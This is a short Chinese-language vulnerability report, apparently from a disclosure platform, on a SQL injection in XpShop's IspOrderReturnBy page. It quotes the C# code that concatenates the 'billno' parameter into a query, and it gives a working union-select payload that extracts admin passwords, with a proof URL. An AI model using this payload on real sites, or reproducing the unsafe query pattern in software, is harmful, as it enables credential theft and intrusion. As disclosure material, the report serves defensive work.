### 简要描述:
应该还有几个就收工了,其实还有一些,不过感觉好累不想弄了。再挖多几个就收工了!
### 详细说明:
漏洞位置xpshop.webui.IspOrderReturnBy:
```
protected void Page_Load(object sender, EventArgs e)
{
base.Response.AddHeader("Pragma", "No-Cache");
base.Response.Buffer = true;
base.Response.ExpiresAbsolute = DateTime.Now.AddSeconds(-1.0);
base.Response.Expires = 0;
base.Response.CacheControl = "no-cache";
OrderDB orderDB = new OrderDB();
int orderID = orderDB.GetOrderID(base.Request["billno"].ToString());
this.order = orderDB.GetOrderDetails(orderID);
```
跟进GetOrderID函数:
```
public int GetOrderID(string orderNo)
{
return int.Parse(XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, "SELECT OrderID FROM Orders WHERE OrderNo = '" + orderNo + "'", null).ToString());
}
```
都是一样没过滤直接进库的。
payload:
/isporderreturnby.aspx?billno=test' union select password from admin--
### 漏洞证明:
http://localhost/isporderreturnby.aspx?billno=test' union select password from admin--
[<img src="https://images.seebug.org/upload/201510/151504072cc45fff495b45c9ad51a2820c4f6663.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/151504072cc45fff495b45c9ad51a2820c4f6663.jpg)
京公网安备 11010502034610号
暂无评论